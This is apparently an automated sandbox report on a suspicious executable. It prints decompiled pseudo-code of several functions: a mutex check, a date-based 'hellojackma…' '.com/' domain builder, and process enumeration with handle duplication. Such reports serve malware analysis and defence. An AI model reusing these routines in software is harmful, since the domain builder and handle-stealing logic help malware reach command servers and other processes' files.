			E1001A3D0(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				int _v12;
				short* _v16;

				_v16 = 0;
				_v12 = E1000CAD0(_a4);
				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
				_t9 = _v8 + 2; // 0x2
				_v16 = L1000CEAF(__ebx, _a4, __edi, __esi, _v8 + _t9);
				_t13 = _v8 + 2; // 0x2
				E1000CF80(__edi, _v16, 0, _v8 + _t13);
				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
				_v16[_v8] = 0;
				return _v16;
			}

0x1001a3d6
0x1001a3e9
0x1001a402
0x1001a408
0x1001a415
0x1001a41b
0x1001a426
0x1001a442
0x1001a44e
0x1001a45a

APIs

_strlen.LIBCMT ref: 1001A3E1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3FC
_memset.LIBCMT ref: 1001A426
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A442

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_memset_strlen
String ID:
API String ID: 745779501-0
Opcode ID: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
Instruction ID: 8dd7a9ca22c507c9c9ca29094530ba01303feab9f029a6df08f7648fa224dc70
Opcode Fuzzy Hash: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
Instruction Fuzzy Hash: 1D11F1B9E00208BFEB14CFD4D895F9EB7B4EB48704F108198FA099B381D671AA058B91

Uniqueness

Uniqueness Score: -1.00%

Function 1001F5D0, Relevance: 6.0, APIs: 4, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1001F5D0() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				struct _SYSTEMTIME _v52;
				struct _FILETIME _v60;
				intOrPtr _t31;

				_v28.wYear = 0x7b2;
				_v28.wMonth = 1;
				_v28.wDay = 1;
				_v28.wHour = 0;
				_v28.wMinute = 0;
				_v28.wSecond = 0;
				_v28.wMilliseconds = 0;
				GetSystemTime( &_v52);
				SystemTimeToFileTime( &_v52,  &_v12);
				SystemTimeToFileTime( &_v28,  &_v60);
				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
				asm("sbb eax, [ebp-0x34]");
				_v36 = E1000F2F0(_t31, _v12.dwHighDateTime, 0x2710, 0);
				_v32 = _t31;
				return _v36;
			}

0x1001f5d6
0x1001f5dc
0x1001f5e2
0x1001f5e8
0x1001f5ee
0x1001f5f4
0x1001f5fa
0x1001f604
0x1001f612
0x1001f620
0x1001f629
0x1001f62f
0x1001f640
0x1001f643
0x1001f64f

APIs

GetSystemTime.KERNEL32(?), ref: 1001F604
SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F612
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F620
__aulldiv.LIBCMT ref: 1001F63B

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Time$System$File$__aulldiv
String ID:
API String ID: 3735792614-0
Opcode ID: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
Instruction ID: af96395ebe124ed86fc63cf5983e6bcf699a861f8abc8f1b8a76f2a7ba2cf47c
Opcode Fuzzy Hash: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
Instruction Fuzzy Hash: A501E575D1021DEADB00DFD4C8899EEB7B8FF04304F104649E904A7250EB79668ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 1001A150, Relevance: 6.0, APIs: 4, Instructions: 36
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A150(CHAR* _a4) {
				struct _SECURITY_DESCRIPTOR _v24;
				void* _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				int _v44;

				_v44 = 0;
				_v28 = 0;
				InitializeSecurityDescriptor( &_v24, 1);
				SetSecurityDescriptorDacl( &_v24, 1, 0, 0);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor =  &_v24;
				_v28 = CreateMutexA( &_v40, 0, _a4);
				if(_v28 != 0 && GetLastError() == 0xb7) {
					_v44 = 1;
				}
				return _v44;
			}

0x1001a156
0x1001a15d
0x1001a16a
0x1001a17a
0x1001a180
0x1001a187
0x1001a191
0x1001a1a4
0x1001a1ab
0x1001a1ba
0x1001a1ba
0x1001a1c7

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 1001A16A
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000), ref: 1001A17A
CreateMutexA.KERNEL32(0000000C,00000000,100206C4), ref: 1001A19E
GetLastError.KERNEL32 ref: 1001A1AD

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: DescriptorSecurity$CreateDaclErrorInitializeLastMutex
String ID:
API String ID: 4085719312-0
Opcode ID: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
Instruction ID: 3bb7ca3d3a89cab5a40ee6ca153f8139473754825ab1ab767a0ca4e665a0d5f7
Opcode Fuzzy Hash: dfe9d4db1a26c01aa306363c359991dbed2ed50b1dc0d3df9fdb4fd6b1ce982a
Instruction Fuzzy Hash: EC01BB71940309DFEB10DFD0C989BEDBBB4EB08315F600504EA05BA290D7B5AAC5CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 10022BBB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E10022BBB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t71;
				void* _t78;

				_t78 = __eflags;
				_push( *(_t71 - 0x1e) & 0x0000ffff);
				E1000CCA3(__edi, _t71 - 0x12c, "hellojackma%04d%02d5",  *(_t71 - 0x20) & 0x0000ffff);
				 *((intOrPtr*)(_t71 - 0x10)) = E1001A4E0(__ebx,  *(_t71 - 0x20) & 0x0000ffff, __edi, __esi, _t78, _t71 - 0x12c);
				 *((intOrPtr*)(_t71 - 0x2f4)) = E10001160(_t71 - 0x27c, _t78,  *((intOrPtr*)(_t71 - 0x10)));
				 *((intOrPtr*)(_t71 - 0x2f8)) =  *((intOrPtr*)(_t71 - 0x2f4));
				 *((char*)(_t71 - 4)) = 0xb;
				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x2f8)));
				 *((char*)(_t71 - 4)) = 0;
				E100011A0(_t71 - 0x27c);
				_push( *((intOrPtr*)(_t71 - 0x10)));
				E1000CA40(__ebx, __edi, __esi, _t78);
				 *((intOrPtr*)(_t71 - 0x2fc)) = E10001160(_t71 - 0x298, _t78, ".com/");
				 *((intOrPtr*)(_t71 - 0x300)) =  *((intOrPtr*)(_t71 - 0x2fc));
				 *((char*)(_t71 - 4)) = 0xc;
				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x300)));
				 *((char*)(_t71 - 4)) = 0;
				E100011A0(_t71 - 0x298);
				E10001110( *((intOrPtr*)(_t71 + 8)), _t78, _t71 - 0x148);
				 *(_t71 - 0x29c) =  *(_t71 - 0x29c) | 0x00000001;
				 *((intOrPtr*)(_t71 - 4)) = 0xffffffff;
				E100011A0(_t71 - 0x148);
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return  *((intOrPtr*)(_t71 + 8));
			}

APIs

_sprintf.LIBCMT ref: 10022BD1

Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616

Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

Strings

.com/, xrefs: 10022C3D
hellojackma%04d%02d5, xrefs: 10022BC5

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_sprintf_strlen$ErrorFreeHeapLast___sbh_find_block___sbh_free_block
String ID: .com/$hellojackma%04d%02d5
API String ID: 2531412260-1062581820
Opcode ID: bc693b2650d3238bdf810681ac114147c8c26e9283bc14e46fbf12d121a0d9eb
Instruction ID: cd4cb29569ec0e2556b74841a2cacae5ea17faf8370a901a59aadef40f2aa25d
Opcode Fuzzy Hash: bc693b2650d3238bdf810681ac114147c8c26e9283bc14e46fbf12d121a0d9eb
Instruction Fuzzy Hash: F4211575C011299BEB28DB64CC55BEEB7B4EF48380F5081E9E51D63251EB306B84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10002760, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E10002760(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v56;
				char _v84;
				void* _t14;
				intOrPtr _t20;

				_push(0xffffffff);
				_push(E10023468);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t20;
				E10001160( &_v84, __eflags, "vector<T> too long");
				_v8 = 0;
				E10001ED0( &_v56,  &_v84);
				E1000EC4B( &_v56, 0x10331ba8);
				_v8 = 0xffffffff;
				_t14 = E100011A0( &_v84);
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x10002763
0x10002765
0x10002770
0x10002771
0x10002783
0x10002788
0x10002796
0x100027a4
0x100027a9
0x100027b3
0x100027bb
0x100027c5

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 10002796
__CxxThrowException@8.LIBCMT ref: 100027A4

Part of subcall function 1000EC4B: RaiseException.KERNEL32(?,?,1000CCA2,100019D3,?,?,?,?,1000CCA2,100019D3,10331B50,103352E0), ref: 1000EC8B

Strings

vector<T> too long, xrefs: 1000277B

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 1843230569-3788999226
Opcode ID: a619a39a7f4f0357af5b7168be1687b30b05c1c7210f01123cebc4e2a9fbb790
Instruction ID: 905b05d582108690ac10a73c09608c56e8cb02dbeb18c8e8bec9c22668189d51
Opcode Fuzzy Hash: a619a39a7f4f0357af5b7168be1687b30b05c1c7210f01123cebc4e2a9fbb790
Instruction Fuzzy Hash: B8F034B5810548ABDB18DBD4DD82BDEB738EB057A0F504668B512666C4EB346A05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000443C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000443C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_push(0x44);
				E1000F06B(E10022FB8, __ebx, __edi, __esi);
				E10001160(_t25 - 0x28, _t27, "invalid string position");
				_t2 = _t25 - 4;
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t20 = _t25 - 0x50;
				E10001DF0(_t20,  *_t2, _t25 - 0x28);
				 *((intOrPtr*)(_t25 - 0x50)) = 0x100242c8;
				E1000EC4B(_t25 - 0x50, 0x10331558);
				asm("int3");
				_push(__esi);
				_t23 = _t20;
				E10001F50(_t20,  *((intOrPtr*)(_t26 + 8)));
				 *_t23 = 0x100242c8;
				return _t23;
			}

0x1000443c
0x1000443c
0x10004443
0x10004450
0x10004455
0x10004455
0x1000445d
0x10004460
0x1000446e
0x10004475
0x1000447a
0x1000447b
0x10004480
0x10004482
0x10004487
0x10004490

APIs

__EH_prolog3.LIBCMT ref: 10004443
__CxxThrowException@8.LIBCMT ref: 10004475

Part of subcall function 1000EC4B: RaiseException.KERNEL32(?,?,1000CCA2,100019D3,?,?,?,?,1000CCA2,100019D3,10331B50,103352E0), ref: 1000EC8B

Part of subcall function 10001F50: std::exception::exception.LIBCMT ref: 10001F73

Strings

invalid string position, xrefs: 10004448

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
String ID: invalid string position
API String ID: 2977319401-1799206989
Opcode ID: 425839f80723953430c3c2f49888e2462970fb45d85aa7fe8659882eeb4357a4
Instruction ID: f47953e82ff53cff568e2d9dd22296eb8b1e5e8ba258ef67d8cf7bd965a875fe
Opcode Fuzzy Hash: 425839f80723953430c3c2f49888e2462970fb45d85aa7fe8659882eeb4357a4
Instruction Fuzzy Hash: 3DE06DB5500168EBE704DBD4EC41ADEB778EF44391FC2092AF205A7149CF75A909CB64

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 1618257864703.exe PID: 6876 Parent PID: 6676 1618257864703.exeCOMMON

Executed Functions

Function 0040CE93, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 122
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040CE93(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				void _v1102;
				void* _v1104;
				intOrPtr _v1636;
				long _v1652;
				void _v1656;
				void* _v1660;
				void* __edi;
				void* __esi;
				void* _t42;
				int _t47;
				long _t50;
				void* _t51;
				void* _t57;
				struct HINSTANCE__* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t79;
				void* _t84;
				void* _t85;
				void* _t86;

				_t79 = _a4;
				_t2 = _t79 + 0x2c; // 0x40c800
				E00403F55(_t2);
				_t42 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t42;
				memset( &_v1656, 0, 0x228);
				_t85 = _t84 + 0xc;
				_v1660 = 0x22c;
				Process32FirstW(_v12,  &_v1660); // executed
				while(1) {
					_t47 = Process32NextW(_v12,  &_v1660); // executed
					if(_t47 == 0) {
						break;
					}
					E0040C997( &_v580);
					_t50 = _v1652;
					_v580 = _t50;
					_v52 = _v1636;
					_t51 = OpenProcess(0x410, 0, _t50);
					__eflags = _t51;
					_v8 = _t51;
					if(_t51 != 0) {
						L4:
						_v1104 = 0;
						memset( &_v1102, 0, 0x208);
						_t86 = _t85 + 0xc;
						E0040D049(_t79, _v8,  &_v1104);
						__eflags = _v1104;
						if(_v1104 == 0) {
							L6:
							__eflags =  *0x4136ec; // 0x1
							_v16 = 0x104;
							if(__eflags == 0) {
								_t69 = GetModuleHandleW(L"kernel32.dll");
								__eflags = _t69;
								if(_t69 != 0) {
									 *0x4136ec = 1;
									 *0x4136f0 = GetProcAddress(_t69, "QueryFullProcessImageNameW");
								}
							}
							_t57 =  *0x4136f0;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57(_v8, 0,  &_v1104,  &_v16); // executed
							}
							L11:
							E0040CAF2( &_v576,  &_v1104);
							E0040CE3D(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t85 = _t86 + 0x14;
							CloseHandle(_v8);
							_t79 = _a4;
							L12:
							_t37 = _t79 + 0x2c; // 0x40c800
							E0040D0D3(_t37,  &_v580);
							continue;
						}
						__eflags = _v1104 - 0x3f;
						if(_v1104 != 0x3f) {
							goto L11;
						}
						goto L6;
					}
					_t71 = E004058FB();
					__eflags =  *((intOrPtr*)(_t71 + 4)) - 5;
					if( *((intOrPtr*)(_t71 + 4)) <= 5) {
						goto L12;
					}
					_t72 = OpenProcess(0x1000, 0, _v580);
					__eflags = _t72;
					_v8 = _t72;
					if(_t72 == 0) {
						goto L12;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

0x0040ce9f
0x0040cea2
0x0040cea5
0x0040ceaf
0x0040ceb9
0x0040cec4
0x0040cec9
0x0040ced6
0x0040cee0
0x0040d022
0x0040d02c
0x0040d033
0x00000000
0x00000000
0x0040cef0
0x0040cef5
0x0040cf0e
0x0040cf14
0x0040cf17
0x0040cf19
0x0040cf1b
0x0040cf1e
0x0040cf48
0x0040cf55
0x0040cf5c
0x0040cf61
0x0040cf70
0x0040cf75
0x0040cf7c
0x0040cf88
0x0040cf88
0x0040cf8e
0x0040cf95
0x0040cf9c
0x0040cfa2
0x0040cfa4
0x0040cfac
0x0040cfbc
0x0040cfbc
0x0040cfa4
0x0040cfc1
0x0040cfc6
0x0040cfc8
0x0040cfd9
0x0040cfd9
0x0040cfdb
0x0040cfe7
0x0040cfff
0x0040d004
0x0040d00a
0x0040d010
0x0040d013
0x0040d01a
0x0040d01d
0x00000000
0x0040d01d
0x0040cf7e
0x0040cf86
0x00000000
0x00000000
0x00000000
0x0040cf86
0x0040cf20
0x0040cf25
0x0040cf29
0x00000000
0x00000000
0x0040cf3b
0x0040cf3d
0x0040cf3f
0x0040cf42
0x00000000
0x00000000
0x00000000
0x0040cf42
0x0040d046

APIs

Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CEAF
memset.MSVCRT ref: 0040CEC4
Process32FirstW.KERNEL32(0040C7D4,?), ref: 0040CEE0
OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 0040CF17
OpenProcess.KERNEL32(00001000,00000000,?), ref: 0040CF3B
memset.MSVCRT ref: 0040CF5C
GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 0040CF9C
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0040CFB6
QueryFullProcessImageNameW.KERNELBASE(?,00000000,?,00000104,?,?), ref: 0040CFD9
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 0040D00A
Process32NextW.KERNEL32(0040C7D4,0000022C), ref: 0040D02C
CloseHandle.KERNEL32(0040C7D4,0040C7D4,0000022C,?,?,?,?,?,?), ref: 0040D03C

Strings

kernel32.dll, xrefs: 0040CF97
QueryFullProcessImageNameW, xrefs: 0040CFA6
?, xrefs: 0040CF7E

Memory Dump Source

Source File: 0000000B.00000002.385462533.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.385454430.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385500949.000000000040F000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.385521248.0000000000412000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.385532462.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
String ID: ?$QueryFullProcessImageNameW$kernel32.dll
API String ID: 239888749-1549906504
Opcode ID: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
Instruction ID: b0c56ac076400066d7f85ee915419da0325970425bfee0af64f00aa3922c561f
Opcode Fuzzy Hash: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
Instruction Fuzzy Hash: E2413DB1D00119EEDF20DFA1DC85ADEB7B9EB04308F0041BAE609B2191D7755F998F99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6FB, Relevance: 19.7, APIs: 13, Instructions: 207
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040C6FB(void*** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, long* _a12, signed int* _a16) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v36;
				intOrPtr _v40;
				int _v44;
				intOrPtr _v48;
				int _v52;
				char _v56;
				int _v60;
				intOrPtr _v64;
				int _v68;
				char _v72;
				int _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				int _v96;
				int _v100;
				void _v622;
				short _v624;
				char _v1616;
				void _v1623;
				char _v1624;
				void* __esi;
				void* _t97;
				void* _t99;
				long _t101;
				intOrPtr _t102;
				void* _t110;
				void* _t111;
				void* _t114;
				void* _t116;
				void* _t128;
				void* _t131;
				signed char* _t152;
				void* _t153;
				void** _t154;
				void*** _t155;
				intOrPtr _t158;
				signed short* _t159;
				void* _t163;
				void* _t164;
				void* _t165;

				_t165 = __eflags;
				_t155 = __eax;
				_v28 = 0;
				_v32 = 0;
				_v624 = 0;
				memset( &_v622, 0, 0x208);
				E00405800( &_v624);
				_t164 = _t163 + 0x10;
				_t97 = CreateFileW( &_v624, 0x80000000, 3, 0, 3, 0, 0); // executed
				_v12 = _t97;
				_t99 = E0040C572(_t155, _t165); // executed
				_v16 = _t99;
				FindCloseChangeNotification(_v12); // executed
				_t154 =  *_t155;
				_t101 = GetCurrentProcessId();
				if(_v16 == 0) {
					_t153 =  *_t154;
					if(_t153 > 0) {
						_t152 =  &(_t154[2]);
						do {
							if(( *(_t152 - 4) & 0x0000ffff) == _t101 && (_t152[2] & 0x0000ffff) == _v12) {
								_v32 =  *_t152 & 0x000000ff;
							}
							_t152 =  &(_t152[0x10]);
							_t153 = _t153 - 1;
							_t170 = _t153;
						} while (_t153 != 0);
					}
				}
				_t102 = 0x20;
				_v64 = _t102;
				_v48 = _t102;
				_v72 = 0;
				_v60 = 0;
				_v68 = 0;
				_v56 = 0;
				_v44 = 0;
				_v52 = 0;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_v76 = 0;
				E0040CE93(_t153, _t170,  &_v100); // executed
				_v20 = 0;
				if(_v44 > 0) {
					do {
						_t110 = E0040C982(_v20,  &_v56);
						_t36 = _t110 + 4; // 0x4
						_v12 = _t110;
						_t111 = E00405888(_t36);
						_t158 = _a4;
						_v16 = _t111;
						_v8 = 0;
						if( *((intOrPtr*)(_t158 + 0x1c)) <= 0) {
							goto L26;
						} else {
							while(1) {
								_t114 = E00406306(_t158, _v8);
								_push(_v16);
								_push(_t114);
								L0040E03E();
								if(_t114 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 <  *((intOrPtr*)(_t158 + 0x1c))) {
									continue;
								} else {
									goto L26;
								}
								goto L27;
							}
							_t116 = OpenProcess(0x40, 0,  *_v12);
							__eflags = _t116;
							_v16 = _t116;
							if(_t116 != 0) {
								__eflags =  *_t154;
								_v24 = 0;
								if( *_t154 > 0) {
									_t159 =  &(_t154[1]);
									do {
										__eflags = ( *_t159 & 0x0000ffff) -  *_v12;
										if(( *_t159 & 0x0000ffff) !=  *_v12) {
											goto L21;
										} else {
											__eflags = (_t159[2] & 0x000000ff) - _v32;
											if((_t159[2] & 0x000000ff) != _v32) {
												goto L21;
											} else {
												_v8 = 0;
												DuplicateHandle(_v16, _t159[3] & 0x0000ffff, GetCurrentProcess(),  &_v8, 0x80000000, 0, 2); // executed
												__eflags = _v8;
												if(_v8 == 0) {
													goto L21;
												} else {
													_v1624 = 0;
													memset( &_v1623, 0, 0x3e7);
													_t164 = _t164 + 0xc;
													_v36 = 0;
													E0040C41D();
													_t128 =  *0x4132a8;
													__eflags = _t128;
													if(_t128 != 0) {
														 *_t128(_v8, 1,  &_v1624, 0x3e4,  &_v36);
													}
													CloseHandle(_v8);
													_v40 = E00405888( &_v1616);
													_t131 = E00405888(_a8);
													_push(_t131);
													_push(_v40);
													L0040E03E();
													__eflags = _t131;
													if(_t131 == 0) {
														 *_a12 =  *_v12;
														_v28 = 1;
														 *_a16 = _t159[3] & 0x0000ffff;
													} else {
														goto L21;
													}
												}
											}
										}
										goto L24;
										L21:
										_v24 = _v24 + 1;
										_t159 =  &(_t159[8]);
										__eflags = _v24 -  *_t154;
									} while (_v24 <  *_t154);
								}
								L24:
								CloseHandle(_v16);
							}
							__eflags = _v28;
							if(_v28 == 0) {
								goto L26;
							}
						}
						goto L27;
						L26:
						_v20 = _v20 + 1;
					} while (_v20 < _v44);
				}
				L27:
				if(_v100 != 0) {
					FreeLibrary(_v100); // executed
					_v100 = 0;
				}
				E00403F55( &_v56);
				E00403F55( &_v72);
				return _v28;
			}

0x0040c6fb
0x0040c70e
0x0040c718
0x0040c71b
0x0040c71e
0x0040c725
0x0040c731
0x0040c736
0x0040c74c
0x0040c752
0x0040c757
0x0040c75f
0x0040c762
0x0040c768
0x0040c76a
0x0040c773
0x0040c775
0x0040c779
0x0040c77b
0x0040c77e
0x0040c784
0x0040c792
0x0040c792
0x0040c795
0x0040c798
0x0040c798
0x0040c798
0x0040c77e
0x0040c779
0x0040c79d
0x0040c79e
0x0040c7a1
0x0040c7a8
0x0040c7ab
0x0040c7ae
0x0040c7b1
0x0040c7b4
0x0040c7b7
0x0040c7ba
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c7c6
0x0040c7c9
0x0040c7cc
0x0040c7cf
0x0040c7d7
0x0040c7da
0x0040c7e0
0x0040c7e6
0x0040c7eb
0x0040c7ee
0x0040c7f1
0x0040c7f6
0x0040c7fc
0x0040c7ff
0x0040c802
0x00000000
0x0040c808
0x0040c808
0x0040c80d
0x0040c812
0x0040c815
0x0040c816
0x0040c81f
0x00000000
0x00000000
0x0040c821
0x0040c82a
0x00000000
0x0040c82c
0x00000000
0x0040c82c
0x00000000
0x0040c82a
0x0040c839
0x0040c83f
0x0040c841
0x0040c844
0x0040c84a
0x0040c84c
0x0040c84f
0x0040c855
0x0040c858
0x0040c85e
0x0040c860
0x00000000
0x0040c866
0x0040c86a
0x0040c86d
0x00000000
0x0040c873
0x0040c87f
0x0040c891
0x0040c897
0x0040c89a
0x00000000
0x0040c89c
0x0040c8a9
0x0040c8af
0x0040c8b4
0x0040c8b7
0x0040c8ba
0x0040c8bf
0x0040c8c4
0x0040c8c6
0x0040c8dd
0x0040c8dd
0x0040c8e2
0x0040c8f6
0x0040c8f9
0x0040c8fe
0x0040c8ff
0x0040c902
0x0040c907
0x0040c90b
0x0040c928
0x0040c931
0x0040c938
0x00000000
0x00000000
0x00000000
0x0040c90b
0x0040c89a
0x0040c86d
0x00000000
0x0040c90d
0x0040c90d
0x0040c913
0x0040c916
0x0040c916
0x0040c91e
0x0040c93a
0x0040c93d
0x0040c93d
0x0040c943
0x0040c946
0x00000000
0x00000000
0x0040c946
0x00000000
0x0040c948
0x0040c948
0x0040c94e
0x0040c7e0
0x0040c957
0x0040c95a
0x0040c95f
0x0040c965
0x0040c965
0x0040c96b
0x0040c973
0x0040c97f

APIs

memset.MSVCRT ref: 0040C725

